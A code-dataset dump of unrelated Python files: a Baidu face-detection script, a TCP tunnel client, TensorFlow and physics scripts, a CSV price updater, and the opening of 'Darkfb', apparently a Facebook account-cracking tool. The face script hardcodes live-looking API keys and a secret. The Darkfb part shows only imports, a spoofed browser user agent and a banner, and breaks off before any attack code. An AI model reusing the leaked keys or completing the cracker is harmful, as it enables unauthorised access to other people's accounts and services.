| 2021-06-20T04:43:02.019309 | 2019-06-20T12:55:26 | 2019-06-20T12:55:26 | 133,342,023 | 0 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,255 |
py
|
import os,time
from aip import AipFace
from PIL import Image, ImageDraw
""" 你的 APPID AK SK """
APP_ID = '10909628'
API_KEY = 'sInxLcVbCLSg6rNXVDXR4sHD'
SECRET_KEY = 'e2zgNstc7GEhhvFOfCVKDW2itVf0iID4'
filepath ="pic"
client = AipFace(APP_ID, API_KEY, SECRET_KEY)
def get_file_content(filePath):
with open(filePath, 'rb') as fp:
return fp.read()
pathDir = os.listdir(filepath)
for path in pathDir:
pic=filepath+'/'+path
pic3="pic3/"+path
image = get_file_content(pic)
""" 调用人脸检测 """
client.detect(image)
""" 如果有可选参数 """
options = {}
options["max_face_num"] = 10
options["face_fields"] = "age"
""" 带参数调用人脸检测 """
res=client.detect(image, options)
try:
result=res["result"]
except:
print(res)
img = Image.open(pic3)
img_d = ImageDraw.Draw(img)
for f in result:
face_rectangle = f["location"]
img_d.rectangle((face_rectangle['left'], face_rectangle['top'],
face_rectangle['left'] + face_rectangle['width'],
face_rectangle['top'] + face_rectangle['height']), outline="red")
img.save(pic3)
img.close()
print("sleep")
time.sleep(2)
|
[
"[email protected]"
] | |
e8773eb18e0bca70b0803491328944b2739f03b1
|
02882742ef02d83d52f48354b44d600df3b7aa47
|
/TCPTunnelClient.py
|
20a0b790fdf47743b956eb0a8d1efeebcc0e9dbc
|
[] |
no_license
|
BIDGroup/TCPTunnel
|
c02c1c46304fe8156815f9a8e4408875de57d533
|
a6b271b13f46156c82283106b3f69b23de4f7f89
|
refs/heads/master
| 2020-03-31T03:28:54.249992 | 2018-10-05T09:39:18 | 2018-10-05T09:39:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,154 |
py
|
import socket
import sys
import time
import threading
def heartCheck(s):
print "Heart Pack Thread Start"
while True:
try:
data = s.recv(128)
if not data:
print "Heart Pack Tunnel Break"
break
except Exception:
print "Heart Pack Tunnel Break"
break
def link(s1,s2):
while True:
try:
data = s1.recv(10240)
if not data:
s1.close();
s2.close();
break;
s2.send(data)
except Exception:
s1.close()
s2.close()
break
print "### TCPTunnelClient ###"
print "Please Enter Local Server Port:"
localPort = int(raw_input())
localAddress = ('0.0.0.0', localPort)
print "Please Enter Re-Link Server Address:"
reLinkIP = raw_input()
print "Please Enter Re-Link Server Port:"
reLinkAddress = (reLinkIP, int(raw_input()))
print "Please Enter Remote Server Address:"
remoteIP = raw_input()
print "Please Enter Remote Server Port:"
remotePort = int(raw_input())
remoteAddress = (remoteIP, remotePort)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
s.bind(localAddress)
s.connect(remoteAddress)
s.send("Hello")
msg = s.recv(512)
print "Successful Link Remote Server!"
print "Get Link Address:", msg
s.close()
print "Start Local Server"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
s.bind(localAddress)
s.listen(localPort)
ss, addr = s.accept()
print "Heart Pack Tunnel Build"
t1 = threading.Thread(target = heartCheck, args=(ss,))
t1.setDaemon(True)
t1.start()
print "Start ReLink Service"
while True:
client, addr = s.accept()
print "Link From:", addr, "Start ReLink"
reLinkClient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
reLinkClient.connect(reLinkAddress)
t2 = threading.Thread(target = link, args=(reLinkClient, client))
t2.setDaemon(True)
t2.start()
t3 = threading.Thread(target = link, args=(client, reLinkClient))
t3.setDaemon(True)
t3.start()
|
[
"[email protected]"
] | |
718e3a5fc92037cb1b160a8aa5414d824609ab9d
|
c3082eb2adc43b311dd3c9ff16fd3ed9df85f266
|
/python/examples/functional/filter.py
|
9c0234468fbdee92b7c2a3dfc2206ea06281c324
|
[] |
no_license
|
szabgab/slides
|
78818c7138331b3ba9e221c81da3678a46efe9b3
|
63bba06678554db737602f2fbcd6510c36037e8a
|
refs/heads/main
| 2023-08-31T07:13:51.536711 | 2023-08-29T13:17:59 | 2023-08-29T13:17:59 | 122,212,527 | 87 | 69 | null | 2023-05-19T06:55:11 | 2018-02-20T14:57:03 |
Python
|
UTF-8
|
Python
| false | false | 122 |
py
|
numbers = [1, 3, 27, 10, 38]
big_numbers = filter(lambda n: n > 10, numbers)
print(big_numbers)
print(list(big_numbers))
|
[
"[email protected]"
] | |
30ca95084a650818ad76ed5e625a46506e6e8e39
|
60e27c8b1755c741dfd069393e8b65766a9647ae
|
/07_Natural_Language_Processing/C0702_bag_of_words.py
|
fb7af5b042f0820d93e1aaa9984960d0ba24a209
|
[
"MIT"
] |
permissive
|
xiejinwen113/tensorflow_cookbook
|
d0426991be2369d6480728c2af7a4dc93eccf621
|
57d7ee719385ddd249a67c3a85bd336e884a67e5
|
refs/heads/master
| 2022-03-24T08:30:43.089441 | 2019-12-09T09:55:39 | 2019-12-09T09:55:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,784 |
py
|
# -*- encoding: utf-8 -*-
"""
@Author : zYx.Tom
@Contact : [email protected]
@site : https://github.com/zhuyuanxiang/tensorflow_cookbook
---------------------------
@Software : PyCharm
@Project : TensorFlow_Machine_Learning_Cookbook
@File : C0702_bag_of_words.py
@Version : v0.1
@Time : 2019-11-07 17:11
@License : (C)Copyright 2018-2019, zYx.Tom
@Reference : 《TensorFlow机器学习实战指南,Nick McClure》, Sec0702,P144
@Desc : 自然语言处理,使用 TensorFlow 实现“词袋”
@理解:
1. 这个模型是个错误的模型,因为数据集本身就是87%的正常短信,那么只要判断为正常短信就有87%的准确率。
而模型的准确率还不到87%,说明正确理解数据集是非常重要的。
2. 跟踪sess.run(x_col_sums,feed_dict = {x_data: t}),也会发现训练的嵌入矩阵的结果就是UNKNOWN单词和'to'单词过多的短信就是垃圾短信,
这个也是因为数据集中数据偏离造成的,根本原因还是模型与数据不匹配。
"""
# common imports
import os
import string
import sys
import matplotlib.pyplot as plt
import numpy as np # pip install numpy<1.17,小于1.17就不会报错
import sklearn
import tensorflow as tf
import winsound
from tensorflow.contrib import learn
from tensorflow.python.framework import ops
# 设置数据显示的精确度为小数点后3位
np.set_printoptions(precision = 8, suppress = True, threshold = np.inf, linewidth = 200)
# 利用随机种子,保证随机数据的稳定性,使得每次随机测试的结果一样
seed = 42
np.random.seed(seed)
tf.set_random_seed(seed)
# Python ≥3.5 is required
assert sys.version_info >= (3, 5)
# Scikit-Learn ≥0.20 is required
assert sklearn.__version__ >= "0.20"
# numpy 1.16.4 is required
assert np.__version__ in ["1.16.5", "1.16.4"]
# 屏蔽警告:Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# 初始化默认的计算图
ops.reset_default_graph()
# Open graph session
sess = tf.Session()
# ----------------------------------------------------------------------
print("载入数据。。。")
# 下载的文件直接读出,没有下载的文件就下载后读出
data_file_name = "../Data/SMS_SPam/SMSSpamCollection"
with open(data_file_name, encoding = 'utf-8') as temp_output_file:
text_data = temp_output_file.read()
pass
pass
# Format Data
text_data = text_data.encode('ascii', errors = 'ignore')
text_data = text_data.decode().split('\n')
text_data = [x.split('\t') for x in text_data if len(x) >= 1]
texts = [x[1] for x in text_data]
target = [x[0] for x in text_data]
# 将标签整数化, 'spam' 表示垃圾短信,设置为1, 'ham' 表示正常短信,设置为0
target = [1 if x == 'spam' else 0 for x in target]
# 文本标准化
texts = [x.lower() for x in texts] # 文本字母小写
texts = [''.join(c for c in x if c not in string.punctuation) for x in texts] # 移除标点符号
texts = [''.join(c for c in x if c not in '0123456789') for x in texts] # 移除数字
texts = [' '.join(x.split()) for x in texts] # 移除多余的空格
# 统计文本中不同长度的单词的数目,最大单词长度不超过50个字母
text_lengths = [len(x.split()) for x in texts]
text_lengths = [x for x in text_lengths if x < 50]
plt.hist(text_lengths, bins = 25)
plt.title("图7-1:文本数据中的单词长度的直方图")
sentence_size = 25 # 每个句子的单词个数最多不超过25个,不足25个用0填充,超过25个的从后往前截断
min_word_freq = 3 # 单词出现的频率不低于3次,如果某个单词只在某几条短信中出现,那么就不选入字典
# TensorFlow 自带的分词器 VocabularyProcessor()
vocab_processor = learn.preprocessing.VocabularyProcessor(sentence_size, min_frequency = min_word_freq)
# Have to fit transform to get length of unique words.
vocab_processor.fit_transform(texts) # 使用文本数据进行训练并且变换为字典
embedding_size = len(vocab_processor.vocabulary_) # 取字典大小为嵌入层的大小
# 将文本数据切分为训练数据集(80%)和测试数据集(20%)
train_indices = np.random.choice(len(texts), int(round(len(texts) * 0.8)), replace = False)
test_indices = np.array(list(set(range(len(texts))) - set(train_indices)))
texts_train = [x for ix, x in enumerate(texts) if ix in train_indices]
texts_test = [x for ix, x in enumerate(texts) if ix in test_indices]
target_train = [x for ix, x in enumerate(target) if ix in train_indices]
target_test = [x for ix, x in enumerate(target) if ix in test_indices]
# 设置单位矩阵用于 One-Hot 编码
identity_mat = tf.diag(tf.ones(shape = [embedding_size]))
# 为 logistic regression 创建变量
A = tf.Variable(tf.random_normal(shape = [embedding_size, 1]))
b = tf.Variable(tf.random_normal(shape = [1, 1]))
# 初始化占位符
x_data = tf.placeholder(shape = [sentence_size], dtype = tf.int32)
y_target = tf.placeholder(shape = [1, 1], dtype = tf.float32)
# 搜索 Text-Vocab Embedding 权重,单位矩阵用于映射句子中的单词的 One-Hot 向量
x_embed = tf.nn.embedding_lookup(identity_mat, x_data)
x_col_sums = tf.reduce_sum(x_embed, 0) # ToDo:为什么要按列求和?
# 模型的输出
x_col_sums_2D = tf.expand_dims(x_col_sums, 0)
model_output = x_col_sums_2D @ A + b
# 交叉熵损失函数
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = y_target, logits = model_output))
# Prediction operation
prediction = tf.sigmoid(model_output)
# Declare optimizer
my_opt = tf.train.GradientDescentOptimizer(0.001)
train_step = my_opt.minimize(loss)
# Intitialize Variables
init = tf.global_variables_initializer()
sess.run(init)
# Start Logistic Regression
print('基于训练集中{}个句子开始训练。。。'.format(len(texts_train)))
loss_vec, train_acc_all, train_acc_avg = [], [], []
for ix, t in enumerate(vocab_processor.transform(texts_train)): # 只转换不训练,不应该再次训练
y_data = [[target_train[ix]]]
sess.run(train_step, feed_dict = {x_data: t, y_target: y_data})
temp_loss = sess.run(loss, feed_dict = {x_data: t, y_target: y_data})
loss_vec.append(temp_loss)
if ix % 100 == 0:
print('训练集迭代次数: #' + str(ix + 1) + ': Loss = ' + str(temp_loss))
pass
[[temp_pred]] = sess.run(prediction, feed_dict = {x_data: t, y_target: y_data})
# 获得预测结果
train_acc_temp = target_train[ix] == np.round(temp_pred)
train_acc_all.append(train_acc_temp)
if len(train_acc_all) >= 50:
# 跟踪最后50个训练精度的平均值
train_acc_avg.append(np.mean(train_acc_all[-50:]))
pass
pass
# 获取测试集的评估精度
print('基于测试集中{}个句子开始评估。。。'.format(len(texts_test)))
test_acc_all = []
for ix, t in enumerate(vocab_processor.transform(texts_test)):
y_data = [[target_test[ix]]]
if ix % 50 == 0:
print("测试集迭代次数 #", ix + 1)
pass
[[temp_pred]] = sess.run(prediction, feed_dict = {x_data: t, y_target: y_data})
test_acc_temp = target_test[ix] == np.round(temp_pred)
test_acc_all.append(test_acc_temp)
pass
print("\n测试集精度: {}".format(np.mean(test_acc_all)))
# Plot training accuracy over time
plt.figure()
plt.plot(range(len(train_acc_avg)), train_acc_avg, 'b-', label = "训练集精度")
plt.title("统计最后50个训练集数据的平均训练集精度")
plt.xlabel('迭代次数')
plt.ylabel("训练集精度")
# -----------------------------------------------------------------
# 运行结束的提醒
winsound.Beep(600, 500)
if len(plt.get_fignums()) != 0:
plt.show()
pass
|
[
"[email protected]"
] | |
7168dd9db8e3031656351de42448d8638bdc049a
|
765ac605a9db834f311cc7cf60553b66d42184fb
|
/lecture_03/task_03/task_03.py
|
a76e4aebf838ec9ba1105492e9113080fe129eee
|
[] |
no_license
|
vasil-dimov/python_softuni_homeworks
|
3946ab13a0b69661f745e1290fa5bd45bdc7c264
|
1efac3679a3c6459c5cb3f597116fcdab8ca2716
|
refs/heads/master
| 2021-06-13T04:25:15.120352 | 2017-03-27T19:01:15 | 2017-03-27T19:01:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 644 |
py
|
FILE_PATH = './../assets/catalog_sample.csv' # or catalog_full.csv
UPDATED_FILE_PATH = './../assets/updated_price_catalog_sample.csv'
PERCENT = 0.75 # 75%
with open(FILE_PATH, encoding='utf-8') as f:
with open(UPDATED_FILE_PATH, 'w', encoding='utf-8') as f_updated:
for line in f:
line = line.strip()
current_line_list = line.split(',')
updated_price = float(current_line_list[-1]) + float(current_line_list[-1]) * PERCENT
current_line_list[-1] = updated_price
updated_line = ','.join(str(e) for e in current_line_list)
f_updated.write(updated_line + '\n')
|
[
"[email protected]"
] | |
2a1a2dba821ba88d97ccfa8b1ac0ad83ecc9db61
|
5a07828016e8bafbea5dac8f83c8bfd5d0bfd603
|
/py_290w290/140309_srw.py
|
ba5c140fc766ac183dd4cc526b37aee626cb33e2
|
[] |
no_license
|
JJHopkins/rajter_compare
|
db5b88d2c6c1efc0fead9b6ed40fb3cce36bedb4
|
2ba52f4f16cf2aca350a82ea58d0aa8f8866c47c
|
refs/heads/master
| 2020-06-04T23:53:57.089329 | 2014-04-08T18:02:30 | 2014-04-08T18:02:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,176 |
py
|
#$ {\bf Free energy between two skewed cylinders (CG-10 in water). Full retarded result, function of separation $\ell$ and angle $\theta$} \\
#$ Equation 12: $G(\ell,\theta) = - \frac{ (\pi R_1^{2})(\pi R_2^{2}) }{2 \pi~\ell^{4} \sin{\theta}} \left( {\cal A}^{(0)}(\ell) + {\cal A}^{(2)}(\ell) \cos 2\theta \right)$ \\
#$ $G(\ell,\theta) = - \frac{k_BT}{64 \pi} \frac{ \pi^2 R_1^{2} R_2^{2} }{\ell^{4} \sin{\theta}} {\sum_{n=0}^{\infty}}' \Delta_{1,\parallel} \Delta_{2,\parallel} ~p_n^{4} ~\int_0^{\infty} t dt ~\frac{e^{- 2 p_n \sqrt{t^{2} + 1}}}{(t^{2} + 1)} \tilde g(t, a_1(i \omega_n), a_2(i \omega_n), \theta),$ \\
#$ with $\tilde g(t, a_1, a_2, \theta) &=& 2 \left[ (1+3a_1)(1+3a_2) t^{4} + 2 (1+2a_1+2a_2+3a_1a_2) t^{2} + 2(1+a_1)(1+a_2)\right] + \nonumber \\
#$ & & ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + (1-a_1)(1-a_2)(t^{2} + 2)^2 \cos 2\theta.$ \\
#!/usr/bin/python
import numpy as np
import scipy.optimize as opt
from scipy.integrate import trapz
import matplotlib.pyplot as pl
from matplotlib import axis as ax
# use pyreport -l file.py
from pylab import show
from matplotlib.ticker import MultipleLocator
from mpl_toolkits.mplot3d import Axes3D
from pylab import pause
from matplotlib.backends.backend_pdf import PdfPages
#pp = PdfPages('plots/skew_ret_water/skew_ret_water.pdf')
eiz_x = np.loadtxt('data/eiz_x_output_eV.txt') #perpendicular, radial
eiz_z = np.loadtxt('data/eiz_z_output_eV.txt') # parallel,axial
eiz_w = np.loadtxt('data/eiz_w_output_eV.txt') # water as intervening medium
#eiz_w[0] = eiz_w[1] #NOTE: there is a jump from first val down to second val
x90_A0, y90_A0 = np.loadtxt('data/290-W-290-PERPA0.PRN',unpack=True, usecols = [0,1]) # water as intervening medium
x90_A2, y90_A2 = np.loadtxt('data/290-W-290-PERPA2.PRN',unpack=True, usecols = [0,1]) # water as intervening medium
r_1 = 1.0e-9
r_2 = 1.0e-9
c = 2.99e8 # in m/s
Temp = 297
kb = 1.3807e-23 # in J/K
coeff = 2.411e14 # in rad/s
# NOTES:
# at RT, 1 kT = 4.11e-21 J
# 1 eV = 1.602e-19 J = 0.016 zJ
# h_bar_eV = 6.5821e-16 eVs
# h_bar = 1. #1.0546e-34 #in Js
#kb = 8.6173e-5 # in eV/K
# z_n_eV = (2*pi*kT/h_bar)n
# = (0.159 eV) / (6.5821e-16 eVs)
# = n*2.411e14 rad/s
# z_n_J = (2*pi*kT/h_bar)n
# = (1.3807e-23 J/K) / (1.0546e-34 Js))*n
# = n*2.411e14 rad/s
#coeff = 0.159 # in eV w/o 1/h_bar
ns = np.arange(0.,500.)
z = ns * coeff
ls = np.linspace(1.0e-9, 1.0e-6, 200)
#thetas = np.linspace((0.01)*np.pi,(1./2)*np.pi,25)
thetas = [np.pi/8,np.pi/4,np.pi/3,np.pi/2]
dt = 1.0
ts = np.arange(1.0,10000.,dt)
def Aiz(perp, par,med):
return (2.0*(perp-med)*med)/((perp+med)*(par-med))
def ys(a,time,eizw,L, N):
term0 = ( time / (time*time+1.0) )
term1 = ( time**4 * 2.0*(1. + 3.*a)*(1.+3.*a) )
term2 = ( time**2 * 4.0*(1. + 2.0*a+2.0*a+3.0*a*a))
term3 = ( 4.0*(1. + a)*(1.0 + a) )
term4 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0))
#print 'ys term0', term0
#print 'ys term1', term1
#print 'ys term2', term2
#print 'ys term3', term3
#print 'ys term4', term4
#print '----'
return (term0) * np.exp(term4)*( (term1) + (term2) + (term3))#* term5
def y_2s(a,time,eizw, L, N):
term0 = (time / (time*time+1.0) )
term1 = ((1.- a)*(1.- a)*(time * time + 2.0)*(time * time + 2.0))
term2 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0))
#print 'y_2s term0', term0
#print 'y_2s term1', term1
#print 'y_2s term2', term2
#print '----'
return term0 * term1* np.exp(term2) #* term3
def As(eizz,eizw,L,N,Y):
term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4))
#term3 = Y
#print 'As term1 = ', term1
#print 'As term2 = ', term2
##print 'As term3 = ', term3
#print '----'
return term1 * term2# * term3
def A_2s(eizz,eizw, L , N ,Y):
term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4))
#term3 = Y
#print 'A_2s term1 = ', term1
#print 'A_2s term2 = ', term2
##print 'A_2s term3 = ', term3
#print '----'
return (term1 * term2)# * term3
y = np.zeros(shape=(len(ns),len(ls)))
y_2 = np.zeros(shape=(len(ns),len(ls)))
A = np.zeros(shape=(len(ns),len(ls)))
A_2 = np.zeros(shape=(len(ns),len(ls)))
EL = np.zeros(len(ls))
G_l_t_dt = np.zeros(shape=(len(ls),len(thetas)))
A2_theta = np.zeros(shape=(len(ls),len(thetas)))
aiz = []
aiz = Aiz(eiz_x,eiz_z, eiz_w) # of length = len(ns)
#aiz[74] = aiz[73]
#aiz[75] = aiz[76]
for k,length in enumerate(ls):
sum_A = np.empty(len(ls))
sum_A_2 = np.empty(len(ls))
for j,n in enumerate(ns):
# Integral:
y[j,k] = trapz(ys(aiz[j],ts,eiz_w[j],length,n),ts,dt)
y_2[j,k] = trapz(y_2s(aiz[j],ts,eiz_w[j],length,n),ts,dt)
#print 'dt Integral y = ',i,k,j, y
#print 'dt Integral y_2 = ',i,k,j, y_2
#print '----'
#print 'N terms for A0 = ' , As(eiz_z[j],eiz_w[j],length,n,y)
#print 'N terms for A2 = ', A_2s(eiz_z[j],eiz_w[j],length,n,y_2)
#print '----'
A[j,k] = As(eiz_z[j],eiz_w[j],length,n,y[j,k])
A_2[j,k] = A_2s(eiz_z[j],eiz_w[j],length,n,y_2[j,k])# * np.cos(2.0*theta)
A[0] = (1./2)*A[0]
A_2[0] = (1./2)*A_2[0]
sum_A = np.sum(A,axis=0)
#print 'sum of A0 = ', k,j,sum_A
sum_A_2 = np.sum(A_2,axis=0)
#print 'sum of A2 = ', k,j,sum_A_2
#print '----'
#print 'shape sum_A_2 = ', np.shape(sum_A_2)
#sys.exit()
for k,length in enumerate(ls):
for i, theta in enumerate(thetas):
EL[k] = 1./(length*length*length*length)
A2_theta[k,i] = sum_A_2[k]* np.cos(2.0*theta)
G_l_t_dt[k,i] = (1.602e-19 / 4.11e-21) * (1./32) * EL[k]*np.pi*r_1*r_1*r_2*r_2*(sum_A[k] + sum_A_2[k]* np.cos(2.0*theta) )/(2.0*np.sin(theta))# (1e21)*
np.savetxt('G_srw.txt',G_l_t_dt)
#pl.figure()
#pl.plot(ns,eiz_x, color = 'b', label = r'$\varepsilon_{\hat{x}}(i\zeta_{N})$')
#pl.plot(ns,eiz_z, color = 'r', label = r'$\varepsilon_{\hat{z}}(i\zeta_{N})$')
##pl.plot(ns,eiz_w, color = 'c', label = r'$\varepsilon_{vac}(i\zeta_{N})$')
#pl.plot(ns,eiz_w, color = 'c', label = r'$\varepsilon_{water}(i\zeta_{N})$')
#pl.xlabel(r'$N$', size = 20)
#pl.ylabel(r'$\varepsilon(i\zeta)$', size = 20)
#pl.legend(loc = 'best')
##pl.title(r'$\mathrm{CG-10\, DNA}$', size = 20)
##pl.axis([0,500,0.9,2.6])
##pl.savefig('plots/skew_ret_water/eiz.pdf' )
#show()
pl.figure()
pl.plot(ns,aiz, color = 'b')#, label = r'$\varepsilon_{\hat{x}}(i\zeta_{N})$')
pl.xlabel(r'$N$', size = 20)
pl.ylabel(r'$a_{1,2}(i\zeta_{N})$', size = 20)
pl.legend(loc = 'best')
#pl.title(r'$\mathrm{Anisotropy \,Metric}$', size = 20)
#pl.axis([0,500,0.9,2.6])
pl.grid()
pl.savefig('plots/skew_ret_water/140306_290w290_aiz.pdf' )
show()
pl.figure()
pl.loglog(1e9*ls,(1e21*kb*Temp/32)*sum_A ,'b-', label = r'$\mathcal{A^{(0)}}(\ell)$')
pl.loglog(1e9*ls,(1e21*kb*Temp/32)*sum_A_2,'g-', label = r'$\mathcal{A^{(2)}}(\ell)$')
pl.loglog(x90_A0, y90_A0,'k-' , label = r'GH $\mathcal{A^{(0)}}(\ell)$')
pl.loglog(x90_A2, y90_A2,'k--', label = r'GH $\mathcal{A^{(2)}}(\ell)$')
pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[nm]}$', size = 20)
pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}\,\,\,\rm{[zJ]}$', size = 20)
#pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20)
#pl.legend(loc = 'best')
#pl.axis([1e-9,1e-6,1e-24,1e-19])
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140309_290w290_GH_skew_ret_A0_A2.pdf')
show()
pl.figure()
pl.loglog(ls,(kb*Temp/32)*sum_A,'b-', label = r'$\mathcal{A^{(0)}}(\ell)$')
pl.loglog(ls,(kb*Temp/32)*sum_A_2,'g-', label = r'$\mathcal{A^{(2)}}(\ell)$')
#pl.loglog(ls,(kb*T/32)*A2_theta,':', label = r'$\mathcal{A^{(2)}}(\ell)cos(2\theta)$')
pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[m]}$', size = 20)
pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}$', size = 20)
#pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'upper right')
#pl.axis([1e-9,1e-6,1e-24,1e-19])
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_A0_A2.pdf')
show()
ls4 = 1e9*ls[ 2]#2]
ls5 = 1e9*ls[12]#4]
ls6 = 1e9*ls[22]#6]
ls1 = 1e9*ls[32]#8]
ls2 = 1e9*ls[42]#12]
ls3 = 1e9*ls[52]#16]
fig = pl.figure()
ax = fig.add_axes([0.1,0.1,0.8,0.8])
#pl.semilogy(thetas, G_l_t_dt)
ax.semilogy(thetas, G_l_t_dt[ 2,:], label = r'$\ell$ = %1.2f nm' %ls4)
ax.semilogy(thetas, G_l_t_dt[12,:], label = r'$\ell$ = %1.2f nm' %ls5)
#ax.semilogy(thetas, G_l_t_dt[22,:], label = r'$\ell$ = %1.2f nm' %ls6)
ax.semilogy(thetas, G_l_t_dt[32,:], label = r'$\ell$ = %1.2f nm' %ls1)
#ax.semilogy(thetas, G_l_t_dt[42,:], label = r'$\ell$ = %1.2f nm' %ls2)
ax.semilogy(thetas, G_l_t_dt[52,:], label = r'$\ell$ = %1.2f nm' %ls3)
#ax.semilogy(0,0,'', label = r'$G_\theta = cos(2\theta)/2sin(\theta)$')
pl.xlabel(r'$Angle\,\,\mathrm{[radians]}$', size = 20)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
#pl.axis([0,1.7,1e-10,1.0])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,angle:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'lower left')
#pl.savefig('plots/skew_ret_water/skew_ret_water_G_vs_theta.pdf')
#show()
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_G_vs_theta_fixed_l.pdf')
show()
pl.figure()
#pl.loglog(ls, G_l_t_dt)#, label = labels[i])
pl.loglog(ls, G_l_t_dt[:,1], label = r'$\theta = \pi/4$')
pl.loglog(ls, G_l_t_dt[:,2], label = r'$\theta = \pi/3$')
pl.loglog(ls, G_l_t_dt[:,3], label = r'$\theta = \pi/2$')
pl.xlabel(r'$\ell\,\,\mathrm{[m]}$', size = 24)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
#pl.axis([1.0e-9, 1.0e-6,1e-16,1e3])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,separation:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'best')
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_G_vs_l.pdf')
show()
|
[
"[email protected]"
] | |
3a3056a3ecc1b144f2938566879e80bcdd3c95c1
|
4561d27896157c67da3c97fb7bd99537b3ec1ac2
|
/Darkfb.sh
|
1be0b8432c647878d63caa02476ed42b381c143a
|
[] |
no_license
|
bang-Habib/dark.fb
|
2fb23d75c544a489b727fd859a137481f700a99a
|
5c774aff111510193d51ce70a8aef50b09de8dab
|
refs/heads/main
| 2023-02-10T14:32:41.114991 | 2021-01-13T12:38:13 | 2021-01-13T12:38:13 | 329,298,237 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 33,210 |
sh
|
#!/usr/bin/python2
# coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
logo = """ \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mAUTHOR \x1b[1;91m: \x1b[1;93mKrisna ft HABIB \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mWhatsApp \x1b[1;92m \x1b[1;91m: \x1b[1;96m+62 895-6224-13472 - +62 857-9889-8387 \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mTEAM \x1b[1;91m: \x1b[1;94mTEAM SQUOT BADUT \x1b[1;95m─╬✫\n 